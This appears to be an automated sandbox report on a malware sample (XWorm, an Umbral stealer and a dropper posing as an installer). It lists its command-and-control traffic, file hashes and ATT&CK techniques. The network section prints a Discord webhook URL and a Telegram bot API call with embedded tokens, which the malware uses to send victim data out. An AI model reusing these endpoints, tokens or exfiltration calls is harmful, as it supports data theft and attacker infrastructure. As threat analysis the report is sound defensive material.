HTTP/1.1 400 Bad Request

Server: nginx/1.18.0
Date: Sat, 27 Apr 2024 15:25:27 GMT
Content-Type: application/json
Content-Length: 73
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

104.193.132.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.193.132.51.in-addr.arpa

IN PTR

Response
DNS

134.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.190.18.2.in-addr.arpa

IN PTR

Response

134.190.18.2.in-addr.arpa

IN PTR

a2-18-190-134deploystaticakamaitechnologiescom
DNS

phentermine-partial.gl.at.ply.gg

XClient.exe

Remote address:

8.8.8.8:53

Request

phentermine-partial.gl.at.ply.gg

IN A

Response

phentermine-partial.gl.at.ply.gg

IN A

147.185.221.19

216.58.201.99:443

https://gstatic.com/generate_204

tls, http

Umbral3.exe

764 B
5.1kB
9
9

HTTP Request

GET https://gstatic.com/generate_204

HTTP Response

204
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

Umbral3.exe

309 B
472 B
5
3

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

XClient.exe

310 B
347 B
5
4

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

3.6kB
26.2kB
54
86
162.159.135.232:443

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

tls, http

Umbral3.exe

438.5kB
13.2kB
329
164

HTTP Request

POST https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

HTTP Response

204

HTTP Request

POST https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y/sendMessage?chat_id=@Xworm234_bot&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AAD3A600F5C1B61F49AAC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2

tls, http

XClient.exe

1.4kB
6.7kB
13
12

HTTP Request

GET https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y/sendMessage?chat_id=@Xworm234_bot&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AAD3A600F5C1B61F49AAC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2

HTTP Response

400
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

702 B
334 B
8
8
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

81.9kB
4.0kB
104
97
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

37.7kB
924 B
35
21
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

552 B
254 B
6
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

552 B
254 B
6
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

552 B
254 B
6
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

552 B
254 B
6
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

506 B
212 B
5
5
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.4kB
236 B
6
5
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.5kB
276 B
7
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

414 B
172 B
3
4
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

1.5kB
212 B
7
5
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

1.3kB
13.6kB
19
26
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

1.5kB
212 B
7
5
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.3kB
276 B
7
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

436 B
212 B
6
5
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.3kB
276 B
7
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.3kB
276 B
7
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.3kB
276 B
7
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.3kB
276 B
7
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.3kB
276 B
7
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

436 B
212 B
6
5
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.3kB
276 B
7
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.3kB
276 B
7
6
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

Server.exe

2.3kB
360 B
7
8
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

627 B
294 B
7
7
147.185.221.19:36969

phentermine-partial.gl.at.ply.gg

XClient.exe

460 B
174 B
4
4

8.8.8.8:53

gstatic.com

dns

Umbral3.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

216.58.201.99
8.8.8.8:53

99.201.58.216.in-addr.arpa

dns

72 B
169 B
1
1

DNS Request

99.201.58.216.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

XClient.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

145 B
262 B
2
2

DNS Request

1.112.95.208.in-addr.arpa

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

phentermine-partial.gl.at.ply.gg

dns

XClient.exe

78 B
94 B
1
1

DNS Request

phentermine-partial.gl.at.ply.gg

DNS Response

147.185.221.19
8.8.8.8:53

19.221.185.147.in-addr.arpa

dns

73 B
130 B
1
1

DNS Request

19.221.185.147.in-addr.arpa
8.8.8.8:53

discord.com

dns

Umbral3.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.135.232

162.159.136.232

162.159.128.233

162.159.138.232

162.159.137.232
8.8.8.8:53

232.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.135.159.162.in-addr.arpa
8.8.8.8:53

api.telegram.org

dns

XClient.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

104.193.132.51.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

104.193.132.51.in-addr.arpa
8.8.8.8:53

134.190.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

134.190.18.2.in-addr.arpa
8.8.8.8:53

phentermine-partial.gl.at.ply.gg

dns

XClient.exe

78 B
94 B
1
1

DNS Request

phentermine-partial.gl.at.ply.gg

DNS Response

147.185.221.19

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

Filesize
654B

MD5
16c5fce5f7230eea11598ec11ed42862

SHA1
75392d4824706090f5e8907eee1059349c927600

SHA256
87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

SHA512
153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5a9b97538363bc5ab5f3d92352560061

SHA1
70815f2fbacb2fd9a59fadb9110ec2d96b8ef533

SHA256
4e00cb8ba8e2f1b9c9fb7c1af39f1bfcfaf32f9f2e476ff3897ee17bc477b23c

SHA512
7974155b3ea099fee0ac3e12ffe5a3427ef2fdd448b5cfe9c17a4af399db9a84e48abe73b9b7bc6d66e7e5774d1e6c15d3135540aa4085973408b41db6b45ff4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8c5fff2c090f31e158e97938c720ee9f

SHA1
324055be6148591f0928ce320b6c325b3f8bb0a8

SHA256
700f8375b5760e1c4c2eedd335fe3dc1097281424b52a8f9e918d0a78dcb65b5

SHA512
0502bc8345c14c0ced566a9afc8210172f49c48cb1c551fb27105311498e79e03b634fbcbbd4a5ce09490b1ca052e813b68d18e93e215ddae3fb983616a29ea3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f3bde5dba3f8b6083eec8169823ce3a3

SHA1
1a4581fd14a07f64075d90791a25959e8afae332

SHA256
1266b3e994f64e316900166fd67d5d1bd58b35ed4ef52dda31b9a97cbf482678

SHA512
210670295949ae8733e79e10494f723728cd7bf9560636f397d0f966282d3619b234f2886c2f9eea1f2021b3b7bd28347d813d45915d04bd8269a67df920cea1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
59649da1edf059761abb0865a6a4785f

SHA1
142dc13d01a0f4919704e7b42e2bc0b2d80068ff

SHA256
27678235ba9f6202a0788bb00e673ef29c129d1f7ed39c6b3711a9152cd0f8ff

SHA512
b8ca5e8039ad28f11bd4aa674deea7b810bd4934b90ff703a1b89f713bfad1444b82924cda5a0ac0a008294ef72d1dc58c29f1eb809f61f24c59e4b26622ee3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
86145a4983c4d894c0c9dd9e4ff0f009

SHA1
a8e43fd7b070bc11476242e1f2714f54dcbc8276

SHA256
ff54b5d1dc749af3a3d46b39d5feeba746aa89bf3810a093cf5aa8259866a620

SHA512
124159cd441b05d456f38e38329a14503c6cd59d48fffa30c32f71a0fd11b1d820297ade894ec6667ba8460115a05305a7e1aae6004f18f9ca24713cbc98dd0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d928f90923f5ff9d64502694f33643fd

SHA1
e6b682eda4540554b331988e3d84d41c49084490

SHA256
e72f59277c81b40e98abf39268d6eed8dbbf1c8e092e224df750e8e136a2784a

SHA512
476f2ae43e6a70a0bf92754945b1d757c0d5b421e80d09e3ecdcb80baf3a2a6b9dec226c91f0e0f8cbb23e59197fa734459942116dd59b084353c36438082f50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f4cebace363955b5fb79b606d1252b9e

SHA1
f57eb08ca60074896c6d65c98e2f8b99450f7aee

SHA256
ba0bf3227005c611f8d0d8ad6c73089c086e94019641f0fc14a303c760b6928a

SHA512
5d63af7b9754546535b86504494ffc6eb0ad79653f148ce4a2e9199badbdf582fac30c31dfeecf79b9d67b21b779d5e4132da8884e1d365c1ca380c719f1a52f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe

Filesize
319KB

MD5
f69924b642ac4b9ef1dfacdfd43759a9

SHA1
95da50564c7cbc3749148419c68a08b0f2869ee1

SHA256
d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

SHA512
2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
93KB

MD5
ba71f783926cbda30d8ff8f295fdd312

SHA1
bd533cc6457836098ff34d07ab2ef6b04ef144b9

SHA256
c6caa8ccc6ac706820712f93ea3a2541da32ec04542b3b7a85d8d85b0f0e1831

SHA512
19767768012b07f3a13dc3e3652c9c3b6376d3ec6199ad384f7011f6db3c6b2e11bff86979d0475a7b58e84e100126661954a667a8217655439aff73b374d5c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

Filesize
229KB

MD5
7a902c87a60986f18a6b097712299256

SHA1
2c01906a39faa9d27a41e0d3cd84e92410b9c483

SHA256
e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5

SHA512
c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\XClient.exe

Filesize
80KB

MD5
3fc932775533f1bcea180de679a902dd

SHA1
3f393d02af4653e34bf5526ec5b6f8d6e4df65e8

SHA256
09a15daeebc228706f36a7659284ef673ea72e7a71700a2f73f4f1409486dd6a

SHA512
f59d35a6fe5517a5b9a1ec9a07899eef9f48745710196f1824cc79823994d6fba7975da457ee06ec6215f56860680dc0c07412268c2b1c725c4c66611a75a764

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oul5lr4x.ghl.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/1412-10-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/2016-22-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/3200-24-0x00000000031B0000-0x00000000031C0000-memory.dmp

Filesize
64KB

Download
memory/3200-395-0x00000000031B0000-0x00000000031C0000-memory.dmp

Filesize
64KB

Download
memory/4212-33-0x0000013F6E7A0000-0x0000013F6E816000-memory.dmp

Filesize
472KB

Download
memory/4212-30-0x0000013F6E5E0000-0x0000013F6E602000-memory.dmp

Filesize
136KB

Download
memory/4544-23-0x0000000000F70000-0x0000000000F8A000-memory.dmp

Filesize
104KB

Download
memory/4544-409-0x0000000001650000-0x000000000165C000-memory.dmp

Filesize
48KB

Download
memory/4580-124-0x000001D56F9D0000-0x000001D56F9EE000-memory.dmp

Filesize
120KB

Download
memory/4580-123-0x000001D571310000-0x000001D571360000-memory.dmp

Filesize
320KB

Download
memory/4580-188-0x000001D5712C0000-0x000001D5712CA000-memory.dmp

Filesize
40KB

Download
memory/4580-189-0x000001D5712F0000-0x000001D571302000-memory.dmp

Filesize
72KB

Download
memory/4580-21-0x000001D56F530000-0x000001D56F570000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.